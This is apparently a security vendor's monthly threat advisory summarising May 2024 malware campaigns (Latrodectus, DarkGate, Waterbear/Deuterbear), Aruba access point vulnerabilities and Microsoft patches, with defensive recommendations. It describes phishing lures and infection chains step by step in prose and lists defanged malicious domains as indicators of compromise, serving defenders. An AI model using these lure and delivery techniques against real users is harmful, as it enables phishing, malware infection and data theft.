May 2024 Threat Advisory – Top 5

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of May 2024.

New TTPs Discovered for Latrodectus Malware Exploit Themes Associated with Microsoft and Cloudflare

Threat Reference: Global

Risks: Data Theft, Malware, and Backdoor

Advisory Type: Threats

Priority: Standard

SecurityHQ has uncovered a new backdoor named Latrodectus being distributed in phishing campaigns. These campaigns use Microsoft Azure and Cloudflare lures, to make emails appear legitimate. This tactic makes it more challenging for email security platforms to detect the emails as malicious.

Latrodectus (aka Unidentified 111 and IceNova) is a Windows malware downloader first discovered in November 2023, used by threat actors tracked as TA577 and TA578, with its primary function being the download of additional EXE and DLL payloads or executing commands. Researchers have correlated this malware with the creators of the extensively deployed IcedID modular malware loader.

Earlier Attack Sequence

1. The attack begins with the adversary filling out online contact forms to send fake copyright infringement notices to targeted organizations.
2. The link in the fake notices leads victims to a Google Firebase URL that hosts a JavaScript file. When executed, this file uses the Windows installer (MSIEXEC) to run an MSI file from a WebDAV share, which contains the Latrodecturs DLL payload.
3. Before executing on the victim’s device, the malware performs various sandbox evasion checks to avoid detection. These checks are designed to identify if the malware is running in a sandbox environment commonly used for security analysis.
4. After passing the evasion checks, the malware initializes by sending a victim registration report to its operators, including information about the infected system and environment.
5. Latrodectus, acting as a downloader, communicates with a command and control (C2) server to receive further instructions.

Recent Attack Sequence

1. Attack starts with reply-chain phishing emails, containing malicious PDF attachments or embedded, which lead to the installation of Latrodectus malware.
2. Attachments use generic names like ’04-25-Inv-Doc-339.pdf’ and pretend to be a document hosted in Microsoft Azure cloud, which must first be downloaded to be viewed.
3. Clicking on the ‘Download Document’ button will redirect the users to a fake ‘Cloudflare security check’ that asks you to solve an easy math question. This is likely to evade email security scanners and deliver the payload only to legitimate users.
4. When the correct answer is entered, the fake Cloudflare captcha will automatically download a JavaScript file pretending to be a document named “Document_i79_13b364058-83054409r0449-8089z4.js”.
5. The downloaded JavaScript script is heavily obfuscated with comments that include a hidden function that extracts text and executes the script to download an MSI from a hardcoded URL.
6. When the MSI file is installed, it drops a DLL in the %AppData%\Custom_update folder and is launched by rundll32.exe. The file names are likely random per installation.
7. The dropped DLL is the Latrodectus malware, which runs quietly in the background, waiting for payloads to install or commands to execute.

At recent attack flow, the Latrodectus malware has been observed dropping additional payloads such as the Lumma information-stealer and Danabot.

Recommendation

1. Monitor the network for presence of mentioned Indicator of Compromise (IOCs).
2. Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.
3. Utilize advanced threat detection mechanisms to analyze email attachments and employ URL filtering technologies to block access to known malicious domains.
4. Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
5. Enforce the principle of least privilege to limit users’ access to sensitive systems and data and implement multi-factor authentication (MFA).
6. Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.
7. Raise awareness among your staff about the potential risks associated with opening suspicious emails or documents in general.

Darkgate Malware Operating Weaponized Attachments to Exploit Windows Operating Systems

Threat Reference: Global

Risks: Data Theft, Privilege Escalation, Malware Injection

Advisory Type: Threats

Priority: Standard

Forcepoint researchers recently uncovered that a form of Darkgate malware was distributed via phishing emails with malicious attachments such as XLSX, HTML, or pdf which take over accounts and replicate themselves. This form of malware is designed to be stealthy and persistent, making it challenging to detect and remove.

Since 2018, DarkGate has been a commodity loader having capabilities, such as downloading and executing files in memory, incorporating a Hidden Virtual Network Computing (HVNC) module, logging keystrokes, stealing information, and enabling privilege escalation. It utilizes genuine AutoIt files and often employs multiple AutoIt scripts.

Attack Flow

1. The campaign begins with a phishing email containing a PDF attachment that appears to be an invoice from “Intuit QuickBooks”. The PDF includes an XObject large image with an embedded hyperlink.
2. Upon clicking on the hyperlink, this triggers the download of a malicious .jar (Java Archive) file containing a .PNG file and a .class file.
3. The .class file has a Java function that aims to download a .ZIP file to ‘C:\Downloads’. The download is performed using an obfuscated ‘curl.exe’ command.
4. Upon successful download of the ZIP file, a PowerShell script is triggered to extract the contents using the ‘expand-archive’ command. The extracted ZIP file contains ‘autoit3.exe’ and a compiled AutoIt script with the ‘.a3x’ extension.
5. The JAR file executes an obfuscated ‘cmd /c’ command to run the compiled AutoIt script. The AutoIt script uses obfuscated functions such as BITXOR and BinaryToString() for malicious activities.
6. The script uses DLLSTRUCTCREATE() and DLLSTRUCTSETDATA() to manipulate system resources and potentially interact with sensitive data.
7. It executes shell code in memory and establishes a connection with a remote Command & Control (C&C) botnet server.

SecurityHQ discovered that the URLs associated follow a historical pattern, featuring domains and single paths reminiscent of those previously utilized by QakBot threat actors.

Indicators of compromise (IOCs), Domains/URLs:

• afarm[.]net/uvz2q
• affixio[.]com/emh0c
• affiliatebash[.]com/myu0f
• afcmanager[.]net/jxk6m
• adventsales[.]co[.]uk/iuw8a
• amikamobile[.]com/ayu4d
• adztrk[.]com/ixi7r
• aerospaceavenue[.]com/cnz8g
• amishwoods[.]com/jwa4v
• smbeckwithlaw[.]com/1[.]zip
• ​kindupdates[.]com

Recommendations

1. Monitor the network for presence of mentioned Indicator of Compromise (IOCs).
2. Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.
3. Utilize advanced threat detection mechanisms to analyze email attachments and employ URL filtering technologies to block access to known malicious domains.
4. Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
5. Enforce the principle of least privilege to limit users’ access to sensitive systems and data and implement multi-factor authentication (MFA).
6. Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.
7. Raise awareness among your staff about the potential risks associated with opening suspicious emails or documents in general.

The Earth Hundun APT Group Utilizes Waterbear and Deuterbear Across the Asia-Pacific Region

Threat Reference: Global

Risks: Data Theft, Unauthorized Access, Privacy Invasion, Malware Injection

Advisory Type: Threats

Priority: Standard

SecurityHQ discovered that Earth Hundun, a threat actor known for targeting the Asia-Pacific region, is using the Waterbear malware and its latest iteration, Deuterbear. SecurityHQ first observed Deuterbear being used by Earth Hundun in October 2022, and it has since been part of the group’s subsequent campaigns.

Waterbear

It operates within the victim’s environment and spreads additional downloaders across the internal network. In the initial stage, Waterbear uses a patched legitimate executable, a loader, and an encrypted download. Waterbear RAT downloads a plugin and injects it into a process. It adapts its communication by hiding activities or connecting to different C&C servers. Before executing commands, it sends detailed victim information to the C&C server. Waterbear identifies processes for injection and gathers related details.

Deuterbear

In the first stage, the loader decrypts the downloader, allowing retrieval of the initial stage RAT. The first stage RAT surveys the victim’s system and finds a persistence folder. The second-stage components, including the loader with decryption, are installed in this folder. On most systems, only the second stage remains after the first stage components are removed.

Deuterbear inherits various components from the downloader, including anti-analysis techniques and encryption keys. It updates communication protocols without a handshake with the C&C server.

Before executing commands, it transmits victim information to the C&C server. Deuterbear replicates functionalities from Waterbear, but with fewer RAT commands and more plugin flexibility.

After plugin installation, traffic determines which plugin is launched, with three protocol options provided.

Comparison

1. Deuterbear offers fewer commands but supports more plugins for enhanced flexibility.
2. It simplifies communication by using the same HTTPS channel and RC4 traffic key as the downloader, avoiding the need for a handshake with the C&C server to update protocols.
3. Deuterbear is the successor to Waterbear, introducing new features.
4. Notably, Waterbear and Deuterbear evolve independently rather than replacing each other.

Indicators of compromise (IOCs), Domains/URLs:

• *.quadrantbd[.]com
• *.taishanlaw[.]com
• *.bakhell[.]com
• *.gelatosg[.]com
• *.operatida[.]com
• *.randaln[.]com
• *.nestnewhome[.]com
• *.dailteeau[.]com
• *.lucashnancy[.]com
• *.ccarden[.]com
• *.availitond[.]com
• *.gayionsd[.]com
• *.rchitecture[.]org
• *.centralizebd[.]com

Recommendation

1. Monitor the network for presence of mentioned Indicator of Compromise (IOCs).
2. Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.
3. Utilize advanced threat detection mechanisms to analyze email attachments and employ URL filtering technologies to block access to known malicious domains.
4. Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
5. Enforce the principle of least privilege to limit users’ access to sensitive systems and data and implement multi-factor authentication (MFA).
6. Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.
7. Raise awareness among your staff about the potential risks associated with opening suspicious emails or documents in general.

HPE Aruba Networking Addressed multiple Critical and High Severity Vulnerabilities Discovered Across Aruba Access Points

Threat Reference: Global

Risks: Remote Code Execution, Arbitrary Code as a Privileged User

Advisory Type: Updates/Patches

Priority: Standard

SecurityHQ has observed that HPE Aruba Networking has released patches for Aruba Access Points running InstantOS and ArubaOS 10 that address multiple security vulnerabilities. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

Affected software versions include ArubaOS 10.5.x.x: 10.5.1.0 and below, ArubaOS 10.4.x.x: 10.4.1.0 and below, InstantOS 8.11.x.x: 8.11.2.1 and below, InstantOS 8.10.x.x: 8.10.0.10 and below, and InstantOS 8.6.x.x: 8.6.0.23 and below.

Notable CVE’s:

• [CVSSv3 Score: 9.8] [CVE-2024-31466, CVE-2024-31467]: Unauthenticated Buffer Overflow Vulnerabilities in CLI Service Accessed by the PAPI Protocol.
• [CVSSv3 Score: 9.8] [CVE-2024-31468, CVE-2024-31469]: Unauthenticated Buffer Overflow Vulnerabilities in Central Communications Service Accessed by the PAPI Protocol.
• [CVSSv3 Score: 9.8] [CVE-2024-31470]: Unauthenticated Buffer Overflow Vulnerability in the Simultaneous Authentication of Equals (SAE) Service Accessed by the PAPI Protocol
• [CVSSv3 Score: 9.8] [CVE-2024-31471]: Unauthenticated Command Injection Vulnerability in Central Communications Service Accessed by the PAPI Protocol
• [CVSSv3 Score: 9.8] [CVE-2024-31472]: Unauthenticated Command Injection Vulnerabilities in the Soft AP Daemon Service Accessed by the PAPI Protocol
• [CVSSv3 Score: 9.8] [CVE-2024-31473]: Unauthenticated Command Injection Vulnerability in the Deauthentication Service Accessed by the PAPI Protocol
• [CVSSv3 Score: 8.2] [CVE-2024-31474]: Unauthenticated Arbitrary File Deletion in CLI Service Accessed by the PAPI Protocol
• [CVSSv3 Score: 8.2] [CVE-2024-31475]: Unauthenticated Arbitrary File Deletion in Central Communications Service Accessed by the PAPI Protocol
• [CVSSv3 Score: 7.2] [CVE-2024-31476, CVE-2024-31477]: Authenticated Remote Command Execution in Aruba InstantOS or ArubaOS 10 Command Line Interface

End of Life Versions:

ArubaOS 10.3.x.x: all, InstantOS 8.9.x.x: all, InstantOS 8.8.x.x: all, InstantOS 8.7.x.x: all, InstantOS 8.5.x.x: all, InstantOS 8.4.x.x: all, InstantOS 6.5.x.x: all, InstantOS 6.4.x.x: all, ArubaOS 10.5.x.x, and InstantOS 8.11.x.x.

Note: SecurityHQ has not observed exploitation activities for these vulnerabilities from threat actor or malware variants.

Recommendations

1. To minimize the likelihood of an attacker exploiting these vulnerabilities, HPE Aruba Networking recommends that the CLI and web-based management interfaces be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above.
2. Enabling cluster-security via the cluster-security command will prevent the vulnerability from being exploited in InstantOS devices running 8.x or 6.x code. For ArubaOS 10 devices this is not an option, instead access to port UDP/8211 must be blocked from all untrusted networks. Please contact HPE Services – Aruba Networking TAC for configuration assistance.

Permanent Fix

It is recommended to upgrade the software to the following versions: ArubaOS 10.6.x.x: 10.6.0.0 and above, ArubaOS 10.5.x.x: 10.5.1.1 and above, ArubaOS 10.4.x.x: 10.4.1.1 and above, InstantOS 8.12.x.x: 8.12.0.0 and above, InstantOS 8.11.x.x: 8.11.2.2 and above, InstantOS 8.10.x.x: 8.10.0.11 and above, and InstantOS 8.6.x: 8.6.0.24 and above.

Microsoft Released May 2024 Patch Tuesday for 61 Flaws, Including 3 Zero-days

Threat Reference: Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for May 2024 with security updates for 61 flaws, including 3 Zero Day Vulnerabilities. Successful exploitation of these vulnerabilities could result in Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service.

Affected Products Include Windows, Windows Hyper-V, .NET & Visual Studio Code, Microsoft Dynamics, Microsoft Office, Microsoft Exchange Server, Microsoft SharePoint Server, CBL-Mariner

Microsoft Edge, Microsoft PowerBI Client, Windows Mobile Broadband Driver, Azure, and Win32k.

Notable CVE’s

• [Zero Day] – CVE-2024-30040 – Windows MSHTML Platform Security Feature Bypass Vulnerability
• [Zero Day] – CVE-2024-30051 – Windows DWM Core Library Elevation of Privilege Vulnerability
• [Zero Day] – CVE-2024-30046 – Visual Studio Denial of Service Vulnerability
• [Critical] – CVE-2024-30044 – Microsoft SharePoint Server Remote Code Execution Vulnerability

For a full list of Important CVEs, view here. https://msrc.microsoft.com/update-guide/releaseNote/2024-May

Recommendation

It is recommended to update all affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats, tracking activities of threat-actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape. For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.